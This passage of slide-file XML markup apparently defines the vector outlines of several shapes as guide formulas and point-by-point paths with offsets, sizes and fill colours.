                  <a:lnTo>
                    <a:pt x="288" y="146"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="286" y="132"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="284" y="117"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="279" y="103"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="275" y="90"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="269" y="75"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="263" y="65"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="254" y="53"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="244" y="42"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="234" y="34"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="223" y="25"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="211" y="17"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="198" y="11"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="184" y="7"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="169" y="3"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="154" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="140" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="140" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="1A3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3848100" y="1296988"/>
              <a:ext cx="458787" cy="463550"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 231 w 289"/>
                <a:gd name="T1" fmla="*/ 261 h 292"/>
                <a:gd name="T2" fmla="*/ 231 w 289"/>
                <a:gd name="T3" fmla="*/ 261 h 292"/>
                <a:gd name="T4" fmla="*/ 233 w 289"/>
                <a:gd name="T5" fmla="*/ 240 h 292"/>
                <a:gd name="T6" fmla="*/ 235 w 289"/>
                <a:gd name="T7" fmla="*/ 221 h 292"/>
                <a:gd name="T8" fmla="*/ 241 w 289"/>
                <a:gd name="T9" fmla="*/ 200 h 292"/>
                <a:gd name="T10" fmla="*/ 247 w 289"/>
                <a:gd name="T11" fmla="*/ 182 h 292"/>
                <a:gd name="T12" fmla="*/ 256 w 289"/>
                <a:gd name="T13" fmla="*/ 163 h 292"/>
                <a:gd name="T14" fmla="*/ 266 w 289"/>
                <a:gd name="T15" fmla="*/ 146 h 292"/>
                <a:gd name="T16" fmla="*/ 277 w 289"/>
                <a:gd name="T17" fmla="*/ 132 h 292"/>
                <a:gd name="T18" fmla="*/ 289 w 289"/>
                <a:gd name="T19" fmla="*/ 115 h 292"/>
                <a:gd name="T20" fmla="*/ 289 w 289"/>
                <a:gd name="T21" fmla="*/ 115 h 292"/>
                <a:gd name="T22" fmla="*/ 283 w 289"/>
                <a:gd name="T23" fmla="*/ 92 h 292"/>
                <a:gd name="T24" fmla="*/ 272 w 289"/>
                <a:gd name="T25" fmla="*/ 69 h 292"/>
                <a:gd name="T26" fmla="*/ 258 w 289"/>
                <a:gd name="T27" fmla="*/ 50 h 292"/>
                <a:gd name="T28" fmla="*/ 239 w 289"/>
                <a:gd name="T29" fmla="*/ 34 h 292"/>
                <a:gd name="T30" fmla="*/ 218 w 289"/>
                <a:gd name="T31" fmla="*/ 19 h 292"/>
                <a:gd name="T32" fmla="*/ 197 w 289"/>
                <a:gd name="T33" fmla="*/ 9 h 292"/>
                <a:gd name="T34" fmla="*/ 172 w 289"/>
                <a:gd name="T35" fmla="*/ 3 h 292"/>
                <a:gd name="T36" fmla="*/ 147 w 289"/>
                <a:gd name="T37" fmla="*/ 0 h 292"/>
                <a:gd name="T38" fmla="*/ 147 w 289"/>
                <a:gd name="T39" fmla="*/ 0 h 292"/>
                <a:gd name="T40" fmla="*/ 131 w 289"/>
                <a:gd name="T41" fmla="*/ 0 h 292"/>
                <a:gd name="T42" fmla="*/ 116 w 289"/>
                <a:gd name="T43" fmla="*/ 3 h 292"/>
                <a:gd name="T44" fmla="*/ 104 w 289"/>
                <a:gd name="T45" fmla="*/ 7 h 292"/>
                <a:gd name="T46" fmla="*/ 89 w 289"/>
                <a:gd name="T47" fmla="*/ 11 h 292"/>
                <a:gd name="T48" fmla="*/ 77 w 289"/>
                <a:gd name="T49" fmla="*/ 17 h 292"/>
                <a:gd name="T50" fmla="*/ 64 w 289"/>
                <a:gd name="T51" fmla="*/ 25 h 292"/>
                <a:gd name="T52" fmla="*/ 54 w 289"/>
                <a:gd name="T53" fmla="*/ 34 h 292"/>
                <a:gd name="T54" fmla="*/ 43 w 289"/>
                <a:gd name="T55" fmla="*/ 42 h 292"/>
                <a:gd name="T56" fmla="*/ 33 w 289"/>
                <a:gd name="T57" fmla="*/ 53 h 292"/>
                <a:gd name="T58" fmla="*/ 25 w 289"/>
                <a:gd name="T59" fmla="*/ 65 h 292"/>
                <a:gd name="T60" fmla="*/ 18 w 289"/>
                <a:gd name="T61" fmla="*/ 75 h 292"/>
                <a:gd name="T62" fmla="*/ 12 w 289"/>
                <a:gd name="T63" fmla="*/ 90 h 292"/>
                <a:gd name="T64" fmla="*/ 6 w 289"/>
                <a:gd name="T65" fmla="*/ 103 h 292"/>
                <a:gd name="T66" fmla="*/ 4 w 289"/>
                <a:gd name="T67" fmla="*/ 117 h 292"/>
                <a:gd name="T68" fmla="*/ 2 w 289"/>
                <a:gd name="T69" fmla="*/ 132 h 292"/>
                <a:gd name="T70" fmla="*/ 0 w 289"/>
                <a:gd name="T71" fmla="*/ 146 h 292"/>
                <a:gd name="T72" fmla="*/ 0 w 289"/>
                <a:gd name="T73" fmla="*/ 146 h 292"/>
                <a:gd name="T74" fmla="*/ 2 w 289"/>
                <a:gd name="T75" fmla="*/ 161 h 292"/>
                <a:gd name="T76" fmla="*/ 4 w 289"/>
                <a:gd name="T77" fmla="*/ 175 h 292"/>
                <a:gd name="T78" fmla="*/ 6 w 289"/>
                <a:gd name="T79" fmla="*/ 190 h 292"/>
                <a:gd name="T80" fmla="*/ 12 w 289"/>
                <a:gd name="T81" fmla="*/ 203 h 292"/>
                <a:gd name="T82" fmla="*/ 18 w 289"/>
                <a:gd name="T83" fmla="*/ 215 h 292"/>
                <a:gd name="T84" fmla="*/ 25 w 289"/>
                <a:gd name="T85" fmla="*/ 228 h 292"/>
                <a:gd name="T86" fmla="*/ 33 w 289"/>
                <a:gd name="T87" fmla="*/ 240 h 292"/>
                <a:gd name="T88" fmla="*/ 43 w 289"/>
                <a:gd name="T89" fmla="*/ 250 h 292"/>
                <a:gd name="T90" fmla="*/ 54 w 289"/>
                <a:gd name="T91" fmla="*/ 259 h 292"/>
                <a:gd name="T92" fmla="*/ 64 w 289"/>
                <a:gd name="T93" fmla="*/ 267 h 292"/>
                <a:gd name="T94" fmla="*/ 77 w 289"/>
                <a:gd name="T95" fmla="*/ 275 h 292"/>
                <a:gd name="T96" fmla="*/ 89 w 289"/>
                <a:gd name="T97" fmla="*/ 282 h 292"/>
                <a:gd name="T98" fmla="*/ 104 w 289"/>
                <a:gd name="T99" fmla="*/ 286 h 292"/>
                <a:gd name="T100" fmla="*/ 116 w 289"/>
                <a:gd name="T101" fmla="*/ 290 h 292"/>
                <a:gd name="T102" fmla="*/ 131 w 289"/>
                <a:gd name="T103" fmla="*/ 292 h 292"/>
                <a:gd name="T104" fmla="*/ 147 w 289"/>
                <a:gd name="T105" fmla="*/ 292 h 292"/>
                <a:gd name="T106" fmla="*/ 147 w 289"/>
                <a:gd name="T107" fmla="*/ 292 h 292"/>
                <a:gd name="T108" fmla="*/ 170 w 289"/>
                <a:gd name="T109" fmla="*/ 290 h 292"/>
                <a:gd name="T110" fmla="*/ 191 w 289"/>
                <a:gd name="T111" fmla="*/ 286 h 292"/>
                <a:gd name="T112" fmla="*/ 212 w 289"/>
                <a:gd name="T113" fmla="*/ 275 h 292"/>
                <a:gd name="T114" fmla="*/ 233 w 289"/>
                <a:gd name="T115" fmla="*/ 265 h 292"/>
                <a:gd name="T116" fmla="*/ 233 w 289"/>
                <a:gd name="T117" fmla="*/ 265 h 292"/>
                <a:gd name="T118" fmla="*/ 231 w 289"/>
                <a:gd name="T119" fmla="*/ 261 h 292"/>
                <a:gd name="T120" fmla="*/ 231 w 289"/>
                <a:gd name="T121" fmla="*/ 26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9" h="292">
                  <a:moveTo>
                    <a:pt x="231" y="261"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="231" y="261"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="233" y="240"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="235" y="221"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="241" y="200"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="247" y="182"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="256" y="163"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="266" y="146"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="277" y="132"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="289" y="115"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="289" y="115"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="283" y="92"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="272" y="69"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="258" y="50"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="239" y="34"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="218" y="19"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="197" y="9"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="172" y="3"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="147" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="147" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="131" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="116" y="3"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="104" y="7"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="89" y="11"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="77" y="17"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="64" y="25"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="54" y="34"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="43" y="42"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="33" y="53"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="25" y="65"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="18" y="75"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12" y="90"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6" y="103"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4" y="117"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2" y="132"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="146"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="146"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2" y="161"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4" y="175"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6" y="190"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12" y="203"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="18" y="215"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="25" y="228"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="33" y="240"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="43" y="250"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="54" y="259"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="64" y="267"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="77" y="275"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="89" y="282"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="104" y="286"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="116" y="290"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="131" y="292"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="147" y="292"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="147" y="292"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="170" y="290"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="191" y="286"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="212" y="275"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="233" y="265"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="233" y="265"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="231" y="261"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="231" y="261"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="1A3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1"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4792663" y="1803400"/>
              <a:ext cx="631825" cy="701675"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 232 w 398"/>
                <a:gd name="T1" fmla="*/ 0 h 442"/>
                <a:gd name="T2" fmla="*/ 140 w 398"/>
                <a:gd name="T3" fmla="*/ 109 h 442"/>
                <a:gd name="T4" fmla="*/ 52 w 398"/>
                <a:gd name="T5" fmla="*/ 6 h 442"/>
                <a:gd name="T6" fmla="*/ 52 w 398"/>
                <a:gd name="T7" fmla="*/ 6 h 442"/>
                <a:gd name="T8" fmla="*/ 44 w 398"/>
                <a:gd name="T9" fmla="*/ 31 h 442"/>
                <a:gd name="T10" fmla="*/ 32 w 398"/>
                <a:gd name="T11" fmla="*/ 54 h 442"/>
                <a:gd name="T12" fmla="*/ 17 w 398"/>
                <a:gd name="T13" fmla="*/ 75 h 442"/>
                <a:gd name="T14" fmla="*/ 0 w 398"/>
                <a:gd name="T15" fmla="*/ 94 h 442"/>
                <a:gd name="T16" fmla="*/ 0 w 398"/>
                <a:gd name="T17" fmla="*/ 94 h 442"/>
                <a:gd name="T18" fmla="*/ 21 w 398"/>
                <a:gd name="T19" fmla="*/ 106 h 442"/>
                <a:gd name="T20" fmla="*/ 40 w 398"/>
                <a:gd name="T21" fmla="*/ 121 h 442"/>
                <a:gd name="T22" fmla="*/ 59 w 398"/>
                <a:gd name="T23" fmla="*/ 136 h 442"/>
                <a:gd name="T24" fmla="*/ 77 w 398"/>
                <a:gd name="T25" fmla="*/ 152 h 442"/>
                <a:gd name="T26" fmla="*/ 92 w 398"/>
                <a:gd name="T27" fmla="*/ 171 h 442"/>
                <a:gd name="T28" fmla="*/ 109 w 398"/>
                <a:gd name="T29" fmla="*/ 190 h 442"/>
                <a:gd name="T30" fmla="*/ 121 w 398"/>
                <a:gd name="T31" fmla="*/ 211 h 442"/>
                <a:gd name="T32" fmla="*/ 134 w 398"/>
                <a:gd name="T33" fmla="*/ 232 h 442"/>
                <a:gd name="T34" fmla="*/ 146 w 398"/>
                <a:gd name="T35" fmla="*/ 254 h 442"/>
                <a:gd name="T36" fmla="*/ 157 w 398"/>
                <a:gd name="T37" fmla="*/ 277 h 442"/>
                <a:gd name="T38" fmla="*/ 165 w 398"/>
                <a:gd name="T39" fmla="*/ 300 h 442"/>
                <a:gd name="T40" fmla="*/ 171 w 398"/>
                <a:gd name="T41" fmla="*/ 325 h 442"/>
                <a:gd name="T42" fmla="*/ 177 w 398"/>
                <a:gd name="T43" fmla="*/ 352 h 442"/>
                <a:gd name="T44" fmla="*/ 182 w 398"/>
                <a:gd name="T45" fmla="*/ 377 h 442"/>
                <a:gd name="T46" fmla="*/ 184 w 398"/>
                <a:gd name="T47" fmla="*/ 404 h 442"/>
                <a:gd name="T48" fmla="*/ 184 w 398"/>
                <a:gd name="T49" fmla="*/ 432 h 442"/>
                <a:gd name="T50" fmla="*/ 184 w 398"/>
                <a:gd name="T51" fmla="*/ 432 h 442"/>
                <a:gd name="T52" fmla="*/ 184 w 398"/>
                <a:gd name="T53" fmla="*/ 442 h 442"/>
                <a:gd name="T54" fmla="*/ 184 w 398"/>
                <a:gd name="T55" fmla="*/ 442 h 442"/>
                <a:gd name="T56" fmla="*/ 217 w 398"/>
                <a:gd name="T57" fmla="*/ 436 h 442"/>
                <a:gd name="T58" fmla="*/ 246 w 398"/>
                <a:gd name="T59" fmla="*/ 427 h 442"/>
                <a:gd name="T60" fmla="*/ 277 w 398"/>
                <a:gd name="T61" fmla="*/ 417 h 442"/>
                <a:gd name="T62" fmla="*/ 304 w 398"/>
                <a:gd name="T63" fmla="*/ 404 h 442"/>
                <a:gd name="T64" fmla="*/ 329 w 398"/>
                <a:gd name="T65" fmla="*/ 388 h 442"/>
                <a:gd name="T66" fmla="*/ 352 w 398"/>
                <a:gd name="T67" fmla="*/ 371 h 442"/>
                <a:gd name="T68" fmla="*/ 375 w 398"/>
                <a:gd name="T69" fmla="*/ 352 h 442"/>
                <a:gd name="T70" fmla="*/ 394 w 398"/>
                <a:gd name="T71" fmla="*/ 329 h 442"/>
                <a:gd name="T72" fmla="*/ 394 w 398"/>
                <a:gd name="T73" fmla="*/ 329 h 442"/>
                <a:gd name="T74" fmla="*/ 396 w 398"/>
                <a:gd name="T75" fmla="*/ 304 h 442"/>
                <a:gd name="T76" fmla="*/ 398 w 398"/>
                <a:gd name="T77" fmla="*/ 279 h 442"/>
                <a:gd name="T78" fmla="*/ 398 w 398"/>
                <a:gd name="T79" fmla="*/ 279 h 442"/>
                <a:gd name="T80" fmla="*/ 396 w 398"/>
                <a:gd name="T81" fmla="*/ 254 h 442"/>
                <a:gd name="T82" fmla="*/ 394 w 398"/>
                <a:gd name="T83" fmla="*/ 232 h 442"/>
                <a:gd name="T84" fmla="*/ 390 w 398"/>
                <a:gd name="T85" fmla="*/ 209 h 442"/>
                <a:gd name="T86" fmla="*/ 386 w 398"/>
                <a:gd name="T87" fmla="*/ 188 h 442"/>
                <a:gd name="T88" fmla="*/ 377 w 398"/>
                <a:gd name="T89" fmla="*/ 167 h 442"/>
                <a:gd name="T90" fmla="*/ 371 w 398"/>
                <a:gd name="T91" fmla="*/ 146 h 442"/>
                <a:gd name="T92" fmla="*/ 361 w 398"/>
                <a:gd name="T93" fmla="*/ 127 h 442"/>
                <a:gd name="T94" fmla="*/ 350 w 398"/>
                <a:gd name="T95" fmla="*/ 109 h 442"/>
                <a:gd name="T96" fmla="*/ 340 w 398"/>
                <a:gd name="T97" fmla="*/ 90 h 442"/>
                <a:gd name="T98" fmla="*/ 327 w 398"/>
                <a:gd name="T99" fmla="*/ 73 h 442"/>
                <a:gd name="T100" fmla="*/ 313 w 398"/>
                <a:gd name="T101" fmla="*/ 59 h 442"/>
                <a:gd name="T102" fmla="*/ 298 w 398"/>
                <a:gd name="T103" fmla="*/ 44 h 442"/>
                <a:gd name="T104" fmla="*/ 284 w 398"/>
                <a:gd name="T105" fmla="*/ 31 h 442"/>
                <a:gd name="T106" fmla="*/ 267 w 398"/>
                <a:gd name="T107" fmla="*/ 19 h 442"/>
                <a:gd name="T108" fmla="*/ 250 w 398"/>
                <a:gd name="T109" fmla="*/ 9 h 442"/>
                <a:gd name="T110" fmla="*/ 232 w 398"/>
                <a:gd name="T111" fmla="*/ 0 h 442"/>
                <a:gd name="T112" fmla="*/ 232 w 398"/>
                <a:gd name="T113"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8" h="442">
                  <a:moveTo>
                    <a:pt x="232" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="140" y="109"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="52" y="6"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="52" y="6"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="44" y="31"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="32" y="54"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="17" y="75"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="94"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="94"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="21" y="106"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="40" y="121"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="59" y="136"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="77" y="152"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="92" y="171"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="109" y="190"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="121" y="211"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="134" y="232"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="146" y="254"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="157" y="277"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="165" y="300"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="171" y="325"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="177" y="352"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="182" y="377"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="184" y="404"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="184" y="432"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="184" y="432"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="184" y="442"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="184" y="442"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="217" y="436"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="246" y="427"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="277" y="417"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="304" y="404"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="329" y="388"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="352" y="371"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="375" y="352"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="394" y="329"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="394" y="329"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="396" y="304"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="398" y="279"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="398" y="279"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="396" y="254"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="394" y="232"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="390" y="209"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="386" y="188"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="377" y="167"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="371" y="146"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="361" y="127"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="350" y="109"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="340" y="90"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="327" y="73"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="313" y="59"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="298" y="44"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="284" y="31"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="267" y="19"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="250" y="9"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="232" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="232" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="1A3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2"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3675063" y="1803400"/>
              <a:ext cx="641350" cy="701675"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 223 w 404"/>
                <a:gd name="T1" fmla="*/ 432 h 442"/>
                <a:gd name="T2" fmla="*/ 223 w 404"/>
                <a:gd name="T3" fmla="*/ 432 h 442"/>
                <a:gd name="T4" fmla="*/ 223 w 404"/>
                <a:gd name="T5" fmla="*/ 404 h 442"/>
                <a:gd name="T6" fmla="*/ 227 w 404"/>
                <a:gd name="T7" fmla="*/ 377 h 442"/>
                <a:gd name="T8" fmla="*/ 231 w 404"/>
                <a:gd name="T9" fmla="*/ 352 h 442"/>
                <a:gd name="T10" fmla="*/ 236 w 404"/>
                <a:gd name="T11" fmla="*/ 327 h 442"/>
                <a:gd name="T12" fmla="*/ 244 w 404"/>
                <a:gd name="T13" fmla="*/ 302 h 442"/>
                <a:gd name="T14" fmla="*/ 252 w 404"/>
                <a:gd name="T15" fmla="*/ 277 h 442"/>
                <a:gd name="T16" fmla="*/ 261 w 404"/>
                <a:gd name="T17" fmla="*/ 254 h 442"/>
                <a:gd name="T18" fmla="*/ 273 w 404"/>
                <a:gd name="T19" fmla="*/ 234 h 442"/>
                <a:gd name="T20" fmla="*/ 286 w 404"/>
                <a:gd name="T21" fmla="*/ 211 h 442"/>
                <a:gd name="T22" fmla="*/ 298 w 404"/>
                <a:gd name="T23" fmla="*/ 192 h 442"/>
                <a:gd name="T24" fmla="*/ 313 w 404"/>
                <a:gd name="T25" fmla="*/ 171 h 442"/>
                <a:gd name="T26" fmla="*/ 329 w 404"/>
                <a:gd name="T27" fmla="*/ 154 h 442"/>
                <a:gd name="T28" fmla="*/ 348 w 404"/>
                <a:gd name="T29" fmla="*/ 138 h 442"/>
                <a:gd name="T30" fmla="*/ 365 w 404"/>
                <a:gd name="T31" fmla="*/ 121 h 442"/>
                <a:gd name="T32" fmla="*/ 386 w 404"/>
                <a:gd name="T33" fmla="*/ 106 h 442"/>
                <a:gd name="T34" fmla="*/ 404 w 404"/>
                <a:gd name="T35" fmla="*/ 94 h 442"/>
                <a:gd name="T36" fmla="*/ 404 w 404"/>
                <a:gd name="T37" fmla="*/ 94 h 442"/>
                <a:gd name="T38" fmla="*/ 388 w 404"/>
                <a:gd name="T39" fmla="*/ 73 h 442"/>
                <a:gd name="T40" fmla="*/ 371 w 404"/>
                <a:gd name="T41" fmla="*/ 52 h 442"/>
                <a:gd name="T42" fmla="*/ 358 w 404"/>
                <a:gd name="T43" fmla="*/ 27 h 442"/>
                <a:gd name="T44" fmla="*/ 348 w 404"/>
                <a:gd name="T45" fmla="*/ 0 h 442"/>
                <a:gd name="T46" fmla="*/ 348 w 404"/>
                <a:gd name="T47" fmla="*/ 0 h 442"/>
                <a:gd name="T48" fmla="*/ 256 w 404"/>
                <a:gd name="T49" fmla="*/ 109 h 442"/>
                <a:gd name="T50" fmla="*/ 165 w 404"/>
                <a:gd name="T51" fmla="*/ 0 h 442"/>
                <a:gd name="T52" fmla="*/ 165 w 404"/>
                <a:gd name="T53" fmla="*/ 0 h 442"/>
                <a:gd name="T54" fmla="*/ 148 w 404"/>
                <a:gd name="T55" fmla="*/ 9 h 442"/>
                <a:gd name="T56" fmla="*/ 129 w 404"/>
                <a:gd name="T57" fmla="*/ 19 h 442"/>
                <a:gd name="T58" fmla="*/ 115 w 404"/>
                <a:gd name="T59" fmla="*/ 31 h 442"/>
                <a:gd name="T60" fmla="*/ 98 w 404"/>
                <a:gd name="T61" fmla="*/ 44 h 442"/>
                <a:gd name="T62" fmla="*/ 84 w 404"/>
                <a:gd name="T63" fmla="*/ 59 h 442"/>
                <a:gd name="T64" fmla="*/ 71 w 404"/>
                <a:gd name="T65" fmla="*/ 73 h 442"/>
                <a:gd name="T66" fmla="*/ 59 w 404"/>
                <a:gd name="T67" fmla="*/ 90 h 442"/>
                <a:gd name="T68" fmla="*/ 46 w 404"/>
                <a:gd name="T69" fmla="*/ 109 h 442"/>
                <a:gd name="T70" fmla="*/ 36 w 404"/>
                <a:gd name="T71" fmla="*/ 127 h 442"/>
                <a:gd name="T72" fmla="*/ 27 w 404"/>
                <a:gd name="T73" fmla="*/ 146 h 442"/>
                <a:gd name="T74" fmla="*/ 19 w 404"/>
                <a:gd name="T75" fmla="*/ 167 h 442"/>
                <a:gd name="T76" fmla="*/ 13 w 404"/>
                <a:gd name="T77" fmla="*/ 188 h 442"/>
                <a:gd name="T78" fmla="*/ 6 w 404"/>
                <a:gd name="T79" fmla="*/ 211 h 442"/>
                <a:gd name="T80" fmla="*/ 4 w 404"/>
                <a:gd name="T81" fmla="*/ 232 h 442"/>
                <a:gd name="T82" fmla="*/ 0 w 404"/>
                <a:gd name="T83" fmla="*/ 254 h 442"/>
                <a:gd name="T84" fmla="*/ 0 w 404"/>
